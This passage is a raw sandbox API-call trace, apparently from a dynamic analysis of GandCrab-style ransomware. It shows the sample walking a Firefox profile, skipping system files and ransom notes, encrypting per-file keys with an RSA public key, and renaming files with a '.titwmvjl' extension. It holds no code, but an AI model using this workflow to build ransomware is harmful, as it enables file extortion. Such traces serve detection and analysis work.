param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock") returned 120 [0080.352] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0080.353] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.353] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.354] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\") returned 96 [0080.354] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*" [0080.354] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503538 [0080.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.354] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.354] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.354] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.354] lstrcmpW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2=".") returned 1 [0080.354] lstrcmpW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="..") returned 1 [0080.354] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" [0080.354] lstrlenW (lpString=".titwmvjl") returned 9 [0080.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0080.355] VirtualAlloc (lpAddress=0x0, dwSize=0x170, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.355] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4.titwmvjl") returned 161 [0080.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0080.355] lstrlenW (lpString=".jsonlz4") returned 8 [0080.355] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.355] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0080.355] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0080.355] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0080.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="desktop.ini") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="autorun.inf") returned 1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="ntuser.dat") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="iconcache.db") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="bootsect.bak") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="boot.ini") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="thumbs.db") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0080.355] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0080.356] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.356] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.356] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="ntldr") returned -1 [0080.356] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0080.356] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="Bootfont.bin") returned -1 [0080.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0080.356] lstrlenW (lpString=".jsonlz4") returned 8 [0080.356] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.356] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0080.356] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.356] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.356] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0080.357] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.357] ReadFile (in: hFile=0x2dc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0080.368] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.368] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0080.371] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.372] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.372] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.372] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0080.372] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.372] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.372] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.372] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.372] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0080.375] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.375] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.375] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.375] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0080.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.376] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.376] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.376] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0080.378] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.379] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503578) returned 1 [0080.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.379] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0080.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.379] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0080.379] GetLastError () returned 0x0 [0080.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.379] CryptDestroyKey (hKey=0x503578) returned 1 [0080.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.380] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.380] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0080.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.383] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503938) returned 1 [0080.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.383] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0080.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.383] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0080.384] GetLastError () returned 0x0 [0080.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.384] CryptDestroyKey (hKey=0x503938) returned 1 [0080.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.384] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.384] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.384] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.384] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x559, lpOverlapped=0x0) returned 1 [0080.396] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffaa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.397] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x559, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x559, lpOverlapped=0x0) returned 1 [0080.398] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.398] WriteFile (in: hFile=0x2dc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0080.399] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.403] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.403] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.403] CloseHandle (hObject=0x2dc) returned 1 [0080.404] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0080.405] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.405] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.405] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0080.405] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0080.405] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock" [0080.405] lstrlenW (lpString=".titwmvjl") returned 9 [0080.405] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock") returned 120 [0080.406] VirtualAlloc (lpAddress=0x0, dwSize=0x130, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.406] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 129 [0080.406] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a09d2ca4deb61a.lock") returned 120 [0080.406] lstrlenW (lpString=".lock") returned 5 [0080.406] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.406] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0080.406] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.406] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.406] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.406] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0080.406] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0080.406] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\TITWMVJL-DECRYPT.txt" [0080.406] lstrlenW (lpString=".titwmvjl") returned 9 [0080.407] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\TITWMVJL-DECRYPT.txt") returned 116 [0080.407] VirtualAlloc (lpAddress=0x0, dwSize=0x128, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.407] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 125 [0080.407] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\TITWMVJL-DECRYPT.txt") returned 116 [0080.407] lstrlenW (lpString=".txt") returned 4 [0080.407] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.407] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0080.407] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0080.407] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.407] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\TITWMVJL-DECRYPT.txt") returned 116 [0080.407] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\TITWMVJL-DECRYPT.txt") returned 116 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0080.407] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0080.407] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.408] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0080.408] FindClose (in: hFindFile=0x503538 | out: hFindFile=0x503538) returned 1 [0080.409] CloseHandle (hObject=0x2d4) returned 1 [0080.409] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.409] lstrcmpW (lpString1="cert8.db", lpString2=".") returned 1 [0080.409] lstrcmpW (lpString1="cert8.db", lpString2="..") returned 1 [0080.409] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="cert8.db" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db" [0080.409] lstrlenW (lpString=".titwmvjl") returned 9 [0080.409] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0080.409] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.409] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db.titwmvjl") returned 97 [0080.409] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0080.409] lstrlenW (lpString=".db") returned 3 [0080.409] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.409] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".db ") returned 4 [0080.409] lstrcmpiW (lpString1=".db", lpString2=".titwmvjl") returned -1 [0080.409] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.410] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0080.410] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="desktop.ini") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="autorun.inf") returned 1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="ntuser.dat") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="iconcache.db") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="bootsect.bak") returned 1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="boot.ini") returned 1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="ntuser.dat.log") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="thumbs.db") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="KRAB-DECRYPT.html") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="CRAB-DECRYPT.html") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="ntldr") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="NTDETECT.COM") returned -1 [0080.410] lstrcmpiW (lpString1="cert8.db", lpString2="Bootfont.bin") returned 1 [0080.410] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db") returned 88 [0080.410] lstrlenW (lpString=".db") returned 3 [0080.410] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 